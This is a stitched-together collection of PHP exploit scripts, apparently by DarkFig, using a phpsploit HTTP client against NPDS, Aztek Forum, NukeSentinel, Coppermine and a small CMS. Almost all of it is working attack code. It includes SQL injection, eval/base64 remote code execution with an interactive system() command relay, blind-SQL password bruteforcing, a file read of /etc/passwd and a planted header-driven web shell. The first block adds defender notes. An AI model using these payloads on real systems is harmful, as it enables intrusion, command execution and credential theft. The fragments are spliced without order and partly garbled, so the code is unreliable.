/**
 * Entry point of this exploit driver: builds a one-shot PHP payload, then
 * loops over an interactive command prompt and relays each command to the
 * target, printing whatever the target echoes back between two separators.
 *
 * Everything it relies on (phpsploit, head, get_p, cmd_prompt, add_slashes,
 * to_char) is defined outside this block, so their exact contracts are not
 * visible here. Terminates the process with exit(1) on the first failed
 * round-trip; otherwise returns normally once cmd_prompt() yields false.
 *
 * Defender's note: the observable artefacts of this traffic are a non-standard
 * `MypCode` request header carrying base64 text, a `fields=` query parameter
 * on index.php whose value is built by to_char() (presumably a CHAR()-style
 * encoding of the payload), and a response body containing the same 32-hex
 * separator twice. Those are the signals to alert on in WAF/access logs.
 */
function main() {
    // HTTP client used for every request; agent() presumably sets the User-Agent string.
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Prints the banner (defined elsewhere).
    head();
    // Target base URL; get_p('url', true) is presumably "required" — confirm against get_p.
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP code: reads the payload back out of the MypCode request header
    // (PHP exposes a header named MypCode as $_SERVER['HTTP_MYPCODE']).
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator: a per-run marker printed before and after the command output so
    // the response can be sliced with explode() below. rand() is not
    // cryptographic, but the value is only a delimiter here, not a secret.
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code: prefix, separator, eval stub, separator, then exit() and a
    // trailing '//' that comments out whatever the target appends.
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Interactive loop; cmd_prompt() returns false (not a falsy string) to stop.
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass: the command is shipped base64-encoded in a
        // request header rather than in the query string.
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Sends the request; to_char() presumably CHAR()-encodes $final — confirm.
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result: $res[1] is the text between the two printed separators.
        $res = explode($s_sep, $web->getcontent());
        // No second separator means the payload never ran; this exits the whole
        // process, not just the loop.
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            // Payload ran but produced nothing — cause cannot be told apart here.
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
#!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); # Advisory soon if ($argc < 3) { print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n"; exit(1); } $url = getparam('url', 1); $pro = getparam('proxy'); $pra = getparam('proyauth'); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); if ($pro) { $xpl->proxy($pro); } if ($pra) { $xpl->proxyauth($pra); } # +print.php (SQL INJECTION) # | # 124. } elseif (!empty($lid)) { # 125. settype ($lid, "integer"); # 126. PrintPage("links",$DB, $lid); # # 30. if ($oper=="links") { # 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'"); # 32. list($url, $title, $description, $time)=mysql_fetch_row($result); # 40. if ($DB) { # 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents()))); #
+-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums") ---[ CODE ./index/common_actions.php ------------------------------------ $file = $_FILES['upload']['tmp_name']; ... if(@copy($file,$path_file)) $avatar=$path_file; ------------------------------------ | +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =). */ $url = $argv[1]; $prs = $argv[2]; $pra = $argv[3]; $xpl = new phpsploit(); if (!empty($prs)) { $xpl->proxy($prs); } if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1);
if ($argc < 3) { print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n"; exit(1); } $url = getparam("url", 1); $tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke'; $debug = getparam("debug") != "" ? 1 : 0; $benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000'; $proxy = getparam("proxy"); $proxyauth = getparam("proxyauth"); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(0); $xpl->cookiejar(0); if ($proxy) { $xpl->proxy($proxy); } if ($proxyauth) { $xpl->proxyauth($proxyauth); } if ($debug) { debug(1); } print "\nUsername: "******"\nPassword: "; bruteforce('pwd'); exit(0); function bruteforce($field) { global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
/*/ $url = $argv[1]; $adu = $argv[2]; $adp = $argv[3]; $pxs = $argv[4]; $pxa = $argv[5]; $xpl = new phpsploit(); $xpl->agent("InternetExploiter"); $xpl->cookiejar(1); $xpl->allowredirection(1); print "\nheader> ==============================================="; print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)"; print "\nheader> ==============================================="; if (!empty($pxs)) { print "\nstatus> Using a proxy {$pxs}"; $xpl->proxy($pxs); } if (!empty($pxa)) { print "\nstatus> Basic proxy authentification {$pxa}"; $xpl->proxyauth($pxa); } /*/ Table prefix. /*/ print "\nstatus> Searching the version"; $xpl->get($url . 'include/index.html'); if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) { print "\nsploit> Coppermine version " . $matches[1]; } else { print "\nsploit> Not found"; }
#!/usr/bin/php <?php if ($argc < 3) { print "\n --------------------------------------------------------\n Affected.scr..: Simple Web Content Management System\n Poc.ID........: 18070102\n Type..........: SQL Injection\n Risk.level....: Medium\n Src.download..: www.cms-center.com\n Poc.link......: acid-root.new.fr/poc/18070102.txt\n Credits.......: DarkFig\n --------------------------------------------------------\n Usage.........: php xpl.txt <url> <file>\n Options.......: <proxhost:proxport> <proxuser:proxpass>\n Example.......: php xpl.txt http://hihi.org/ /etc/passwd\n --------------------------------------------------------\n"; exit(1); } $url = $argv[1]; $file = $argv[2]; $proxh = $argv[3]; $proxa = $argv[4]; $xpl = new phpsploit(); $xpl->agent("Mozilla"); if ($proxh) { $xpl->proxy($proxh); } if ($proxa) { $xpl->proxyauth($proxa); } /* * $id = $_GET['id']; * $query = "SELECT * from content WHERE id = $id"; * ... * @return $row->text; * * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on). * What we want is not in the database, it's in a file (config.php): * * //this are the logins for the admin part. Change them for security. * $login = "******"; //your login for the admin section. * $pass = "******"; //your login for the admin section. *
<?php error_reporting(E_ALL ^ E_NOTICE); head(); if ($argc < 3) { usage(); } $url = getparam('url', true); $prx = getparam('proxy', false); $pra = getparam('proxyauth', false); $cod = 'eval($_SERVER[HTTP_SHELL]);'; $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(1); $xpl->cookiejar(1); if ($prx) { $xpl->proxy($prx); } if ($pra) { $xpl->proxyauth($pra); } print "0x01>Deleting the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); print "\n0x03>Trying to log in as Administrator"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); // Minimum data necessary (fwrite without quote) $minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1'; print "\n0x04>Creating the file config.inc.php"; $xpl->post($url . 'dirsys/modules/config/post.php', $minimdata); print "\n0x05>Now enter your commands";